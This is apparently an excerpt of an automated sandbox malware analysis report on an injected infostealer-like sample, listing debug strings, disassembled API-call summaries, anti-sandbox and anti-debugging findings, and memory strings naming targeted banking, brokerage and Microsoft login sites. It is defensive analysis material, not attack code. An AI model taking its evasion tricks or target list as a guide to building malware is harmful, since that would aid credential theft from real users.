                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: GVXcOVOPuWmumK.exe, 00000005.00000002.2581811705.000000000019E000.00000002.00000001.01000000.00000005.sdmp, GVXcOVOPuWmumK.exe, 00000007.00000002.2581841839.000000000019E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: cNDddMAF5u.exe, 00000001.00000003.1346554237.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, cNDddMAF5u.exe, 00000001.00000003.1349050815.0000000004060000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1607996500.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1701628281.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1609929988.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1701628281.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1701357405.0000000004E75000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1703817466.0000000005022000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.2586431111.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.2586431111.000000000536E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: rasdial.pdb source: svchost.exe, 00000003.00000003.1668922870.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1701441562.0000000003600000.00000004.00000020.00020000.00000000.sdmp, GVXcOVOPuWmumK.exe, 00000005.00000002.2583970277.0000000001238000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: cNDddMAF5u.exe, 00000001.00000003.1346554237.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, cNDddMAF5u.exe, 00000001.00000003.1349050815.0000000004060000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000003.1607996500.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1701628281.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1609929988.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1701628281.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, rasdial.exe, 00000006.00000003.1701357405.0000000004E75000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1703817466.0000000005022000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.2586431111.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.2586431111.000000000536E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: rasdial.pdbGCTL source: svchost.exe, 00000003.00000003.1668922870.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1701441562.0000000003600000.00000004.00000020.00020000.00000000.sdmp, GVXcOVOPuWmumK.exe, 00000005.00000002.2583970277.0000000001238000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: rasdial.exe, 00000006.00000002.2587246887.00000000057FC000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.2583016993.0000000003429000.00000004.00000020.00020000.00000000.sdmp, GVXcOVOPuWmumK.exe, 00000007.00000002.2586519260.00000000030DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2002060197.0000000006C3C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: rasdial.exe, 00000006.00000002.2587246887.00000000057FC000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.2583016993.0000000003429000.00000004.00000020.00020000.00000000.sdmp, GVXcOVOPuWmumK.exe, 00000007.00000002.2586519260.00000000030DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2002060197.0000000006C3C000.00000004.80000000.00040000.00000000.sdmp
                Source: cNDddMAF5u.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: cNDddMAF5u.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: cNDddMAF5u.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: cNDddMAF5u.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: cNDddMAF5u.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006A42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_006A42DE
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006AA40E push 00000000h; retf 1_2_006AA444
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006C0A76 push ecx; ret 1_2_006C0A89
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00403100 push eax; ret 3_2_00403102
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041E9B7 push esp; ret 3_2_0041E9BF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040D307 push edx; ret 3_2_0040D30E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00417333 push ecx; retf 3_2_00417336
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00411C05 push esi; iretd 3_2_00411C1E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00411C13 push esi; iretd 3_2_00411C1E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00427C33 push eax; iretd 3_2_00427CA9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00425553 push ds; iretd 3_2_00425554
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040D53D push esi; retf 3_2_0040D53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004045F9 push ds; ret 3_2_004045FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00418605 push ebp; retf 3_2_00418633
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00413FD3 push 8BA57A45h; iretd 3_2_00413FEA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C0225F pushad ; ret 3_2_03C027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C027FA pushad ; ret 3_2_03C027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C309AD push ecx; mov dword ptr [esp], ecx3_2_03C309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C0283D push eax; iretd 3_2_03C02858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C01368 push eax; iretd 3_2_03C01369
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C01065 push edi; ret 3_2_03C0108A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C018F3 push edx; iretd 3_2_03C01906
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052009AD push ecx; mov dword ptr [esp], ecx6_2_052009B6
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_03214230 push ecx; retf 6_2_03214233
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_03215502 push ebp; retf 6_2_03215530
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_032215B1 push ecx; ret 6_2_032215B2
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_032244B0 push edi; ret 6_2_032244BB
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_032014F6 push ds; ret 6_2_032014FC
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_03224B30 push eax; iretd 6_2_03224BA6
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0320EB02 push esi; iretd 6_2_0320EB1B
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0320EB10 push esi; iretd 6_2_0320EB1B
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0321B8B4 push esp; ret 6_2_0321B8BC
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006BF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_006BF98E
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_00731C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,1_2_00731C41
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_1-96649
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeAPI/Special instruction interceptor: Address: 16D60AC
                Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C7096E rdtsc 3_2_03C7096E
                Source: C:\Windows\SysWOW64\rasdial.exeWindow / User API: threadDelayed 3246Jump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeWindow / User API: threadDelayed 6727Jump to behavior
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeAPI coverage: 3.7 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\rasdial.exeAPI coverage: 2.7 %
                Source: C:\Windows\SysWOW64\rasdial.exe TID: 336Thread sleep count: 3246 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exe TID: 336Thread sleep time: -6492000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exe TID: 336Thread sleep count: 6727 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exe TID: 336Thread sleep time: -13454000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe TID: 1916Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\rasdial.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_0070DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,1_2_0070DBBE
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006DC2A2 FindFirstFileExW,1_2_006DC2A2
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_007168EE FindFirstFileW,FindClose,1_2_007168EE
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_0071698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,1_2_0071698F
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_0070D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_0070D076
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_0070D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_0070D3A9
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_00719642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00719642
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_0071979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_0071979D
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_00719B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,1_2_00719B2B
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_00715C97 FindFirstFileW,FindNextFileW,FindClose,1_2_00715C97
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0321C8D0 FindFirstFileW,FindNextFileW,FindClose,6_2_0321C8D0
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006A42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_006A42DE
                Source: a155F05G.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: a155F05G.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: a155F05G.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: a155F05G.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: a155F05G.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: a155F05G.6.drBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: a155F05G.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: a155F05G.6.drBinary or memory string: AMC password management pageVMware20,11696492231
                Source: a155F05G.6.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: a155F05G.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: a155F05G.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: a155F05G.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: a155F05G.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: a155F05G.6.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: a155F05G.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: a155F05G.6.drBinary or memory string: discord.comVMware20,11696492231f
                Source: rasdial.exe, 00000006.00000002.2583016993.0000000003429000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2003747259.0000014E46C5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: GVXcOVOPuWmumK.exe, 00000007.00000002.2584767789.000000000120F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
                Source: a155F05G.6.drBinary or memory string: global block list test formVMware20,11696492231
                Source: a155F05G.6.drBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: a155F05G.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: a155F05G.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: a155F05G.6.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: a155F05G.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: a155F05G.6.drBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: a155F05G.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: a155F05G.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: a155F05G.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: a155F05G.6.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: a155F05G.6.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: a155F05G.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: a155F05G.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: a155F05G.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C7096E rdtsc 3_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00417903 LdrLoadDll,3_2_00417903
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_0071EAA2 BlockInput,1_2_0071EAA2
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006D2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_006D2622
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006A42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_006A42DE
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006C4CE8 mov eax, dword ptr fs:[00000030h]1_2_006C4CE8
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_016D6378 mov eax, dword ptr fs:[00000030h]1_2_016D6378
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_016D6318 mov eax, dword ptr fs:[00000030h]1_2_016D6318
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_016D4D28 mov eax, dword ptr fs:[00000030h]1_2_016D4D28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CEC3CD mov eax, dword ptr fs:[00000030h]3_2_03CEC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]3_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]3_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]3_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]3_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]3_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]3_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C383C0 mov eax, dword ptr fs:[00000030h]3_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C383C0 mov eax, dword ptr fs:[00000030h]3_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C383C0 mov eax, dword ptr fs:[00000030h]3_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C383C0 mov eax, dword ptr fs:[00000030h]3_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB63C0 mov eax, dword ptr fs:[00000030h]3_2_03CB63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CDE3DB mov eax, dword ptr fs:[00000030h]3_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CDE3DB mov eax, dword ptr fs:[00000030h]3_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CDE3DB mov ecx, dword ptr fs:[00000030h]3_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CDE3DB mov eax, dword ptr fs:[00000030h]3_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CD43D4 mov eax, dword ptr fs:[00000030h]3_2_03CD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CD43D4 mov eax, dword ptr fs:[00000030h]3_2_03CD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C403E9 mov eax, dword ptr fs:[00000030h]3_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C403E9 mov eax, dword ptr fs:[00000030h]3_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C403E9 mov eax, dword ptr fs:[00000030h]3_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C403E9 mov eax, dword ptr fs:[00000030h]3_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C403E9 mov eax, dword ptr fs:[00000030h]3_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C403E9 mov eax, dword ptr fs:[00000030h]3_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C403E9 mov eax, dword ptr fs:[00000030h]3_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C403E9 mov eax, dword ptr fs:[00000030h]3_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]3_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]3_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]3_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C663FF mov eax, dword ptr fs:[00000030h]3_2_03C663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C2E388 mov eax, dword ptr fs:[00000030h]3_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C2E388 mov eax, dword ptr fs:[00000030h]3_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C2E388 mov eax, dword ptr fs:[00000030h]3_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C5438F mov eax, dword ptr fs:[00000030h]3_2_03C5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C5438F mov eax, dword ptr fs:[00000030h]3_2_03C5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C28397 mov eax, dword ptr fs:[00000030h]3_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C28397 mov eax, dword ptr fs:[00000030h]3_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C28397 mov eax, dword ptr fs:[00000030h]3_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]3_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]3_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]3_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]3_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]3_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]3_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]3_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]3_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]3_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]3_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]3_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]3_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]3_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]3_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]3_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB035C mov eax, dword ptr fs:[00000030h]3_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB035C mov eax, dword ptr fs:[00000030h]3_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB035C mov eax, dword ptr fs:[00000030h]3_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB035C mov ecx, dword ptr fs:[00000030h]3_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB035C mov eax, dword ptr fs:[00000030h]3_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB035C mov eax, dword ptr fs:[00000030h]3_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CFA352 mov eax, dword ptr fs:[00000030h]3_2_03CFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CD8350 mov ecx, dword ptr fs:[00000030h]3_2_03CD8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03D0634F mov eax, dword ptr fs:[00000030h]3_2_03D0634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CD437C mov eax, dword ptr fs:[00000030h]3_2_03CD437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6A30B mov eax, dword ptr fs:[00000030h]3_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6A30B mov eax, dword ptr fs:[00000030h]3_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6A30B mov eax, dword ptr fs:[00000030h]3_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C2C310 mov ecx, dword ptr fs:[00000030h]3_2_03C2C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C50310 mov ecx, dword ptr fs:[00000030h]3_2_03C50310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]3_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]3_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]3_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]3_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]3_2_03C3A2C3
